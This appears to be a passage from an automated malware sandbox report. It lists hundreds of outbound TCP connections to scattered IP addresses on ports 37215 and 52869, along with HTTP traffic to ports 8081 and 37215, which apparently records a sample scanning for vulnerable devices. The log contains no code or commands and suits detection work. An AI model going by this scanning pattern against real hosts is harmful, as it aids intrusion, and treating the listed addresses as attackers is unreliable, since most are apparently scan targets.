                      Source: global trafficTCP traffic: 114.225.14.65 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 61.98.235.91 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.183.110.42 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 154.57.81.200 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 220.27.166.91 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 52.248.88.164 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 72.58.64.100 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 132.127.155.20 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.219.134.66 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 120.181.185.117 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.125.116.0 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.90.229.28 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.181.147.41 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 136.134.137.226 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 72.231.32.39 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 149.40.185.158 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 186.53.99.238 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 180.106.180.212 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 80.33.234.217 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 163.207.135.120 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 17.150.249.106 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 113.211.98.23 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 223.210.25.241 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.86.55.32 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.27.127.22 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 158.68.165.132 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 211.168.65.67 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 75.163.132.69 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 121.209.116.212 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 32.8.164.81 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 158.245.1.223 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.152.249.5 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 166.16.190.83 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.67.163.111 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.164.107.109 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.109.181.54 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.135.32.84 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 216.17.47.144 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 138.188.233.114 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 160.34.93.40 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 178.252.171.252 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.124.218.58 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 196.32.183.241 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.38.238.183 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 131.209.58.23 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 113.47.213.157 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 25.173.117.127 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 78.106.126.128 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 82.244.247.159 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.153.42.4 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 59.10.142.189 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 130.207.23.122 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 1.200.111.50 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 184.192.255.233 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.155.38.231 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 38.225.7.109 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 80.164.32.127 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.5.27.68 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 190.164.230.172 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.232.70.152 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 57.144.122.58 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 132.39.168.140 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 105.246.52.163 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 99.81.223.53 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 199.124.216.172 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 175.91.47.151 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 188.199.48.64 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.93.186.26 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 90.121.157.161 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.209.199.16 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 170.98.124.78 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.96.246.174 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 38.130.134.142 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 13.234.82.233 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 116.108.240.14 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 147.14.244.79 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 98.139.133.85 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.81.135.223 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 59.216.134.233 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 189.230.165.186 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 100.147.99.239 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 81.106.75.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 117.129.252.99 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 141.0.4.62 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.163.208.222 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 59.242.125.217 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 17.184.234.0 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 183.59.191.208 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.13.170.245 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 116.132.89.76 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 142.219.250.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 217.161.186.84 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 186.23.77.122 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.187.231.237 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 37.150.102.99 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 94.44.111.34 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.70.47.135 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 181.89.181.103 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 151.161.78.139 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 205.9.202.98 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 125.97.107.120 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 200.51.205.131 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.52.105.112 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 13.122.59.167 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 212.202.97.136 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.246.44.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 133.17.182.216 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 70.127.37.49 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 102.188.226.205 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 112.153.191.145 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 68.40.200.159 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.104.80.16 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.247.46.12 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 123.111.19.233 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 144.67.31.243 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 70.44.53.32 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 83.71.51.102 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.171.229.193 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.104.97.161 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 166.57.172.211 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 198.193.14.195 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.240.34.42 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 204.46.41.237 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 211.45.136.152 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 59.135.63.153 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 91.206.91.62 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 54.179.197.253 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 80.59.225.141 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.145.104.135 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 191.30.146.121 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 190.231.104.96 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 24.36.23.230 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 152.41.190.171 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 196.77.67.46 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 54.135.221.53 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 40.31.56.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 123.126.11.249 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 101.168.57.208 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 24.82.183.93 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 43.119.39.158 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 47.85.1.133 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 153.104.11.80 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 137.29.148.187 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 37.213.85.230 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 188.78.100.195 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.182.246.174 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 52.222.226.79 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 81.159.195.234 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.112.26.200 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 13.79.184.248 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 138.71.112.70 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 125.218.223.230 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 106.240.191.91 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.27.2.225 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 163.170.37.61 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 49.40.97.50 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.38.118.86 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.183.228.205 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 208.117.82.120 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 219.191.82.150 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 153.115.93.223 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 142.230.49.126 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 8.166.54.209 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 134.144.46.130 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 92.110.185.44 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 205.35.169.26 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.88.18.67 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 211.147.140.76 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 59.165.217.161 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.76.186.37 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 171.9.15.23 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 34.247.156.202 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.70.140.218 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 154.64.178.0 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 51.55.196.22 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 108.167.125.26 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 65.65.245.79 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 210.46.147.71 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 75.120.116.239 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 47.189.88.4 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 190.13.210.38 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 49.40.14.168 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 116.219.5.125 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 103.132.88.33 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 134.214.175.73 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 92.57.180.103 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 199.202.13.130 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 84.176.4.197 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 129.129.31.24 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 44.6.194.12 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 212.45.243.123 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 145.82.197.86 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.94.74.21 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 111.107.133.4 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.18.39.4 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 197.47.178.20 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 220.85.100.118 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 185.83.226.152 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 60.28.5.25 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 111.122.87.190 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 154.155.177.130 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 181.101.160.242 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 25.145.229.184 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 174.135.199.129 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 112.198.90.59 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 108.163.57.3 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 4.107.32.7 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 58.236.61.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.129.208.103 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 4.162.121.105 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 211.173.154.125 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 146.54.174.109 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 23.207.152.146 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 64.130.174.77 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 19.45.76.169 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.162.164.93 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 162.96.80.170 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.204.130.3 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 203.160.70.249 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.48.219.131 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 203.171.109.95 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 118.162.15.87 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 135.6.251.247 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 141.231.43.221 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 106.242.159.86 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 218.210.113.18 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 35.159.139.53 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 52.136.210.121 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 199.117.44.204 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 198.22.21.63 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 138.118.192.144 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.233.53.190 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.184.79.183 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 198.45.18.250 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 1.23.28.195 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 91.48.213.35 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 77.237.114.164 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 130.150.233.95 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 31.247.190.180 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 123.248.134.54 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 37.155.160.245 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 177.160.195.13 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 38.30.142.71 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 95.188.72.113 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 20.40.190.208 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 154.56.85.161 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 51.156.205.139 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 108.217.234.151 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.40.168.196 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 102.92.87.20 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 207.229.195.229 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 79.137.108.6 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 189.228.237.19 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 134.152.143.171 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 113.202.183.61 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 159.79.50.159 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 118.128.140.96 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 128.233.224.41 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 200.238.182.46 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 153.91.158.250 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 62.5.163.114 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 120.205.54.36 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.170.165.170 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 41.133.29.67 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 173.155.18.45 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 102.124.228.209 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 217.57.179.206 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 136.176.36.12 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.146.165.184 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 200.98.155.108 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 176.224.134.202 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 157.248.11.159 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 140.246.6.93 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 165.35.29.207 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 197.206.89.130 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 157.28.53.140 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 202.183.171.29 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 50.224.137.123 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 111.192.150.203 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 9.71.131.31 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 153.126.184.30 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 212.160.183.244 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 41.212.142.21 ports 1,2,3,5,7,37215
                      Source: global trafficTCP traffic: 107.117.108.202 ports 2,5,6,8,9,52869
                      Source: global trafficTCP traffic: 150.137.36.182 ports 2,5,6,8,9,52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43786 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41568 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58742 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43710 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48184 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34928 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57212 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58108 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57564 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56470 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51184 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45306 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40562 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36894 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40982 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50810 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44264 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39646 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44966 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35060 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56376 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59676 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56906 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54084 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37504 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53894 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40586 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46688 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57596 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50876 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60346 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53904 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34418 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38502 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35228 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39766 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51488 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34602 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42090 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50774 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34436 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34480 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43090 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57278 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42340 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48590 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43638 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55366 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47294 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45738 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57716 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37594 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45392 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47806 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32804 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51272 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36214 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35948 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40008 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44230 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44722 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40202 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46850 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56116 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56092 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52176 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59386 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47186 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42092 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36520 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53444 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36374 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 37215
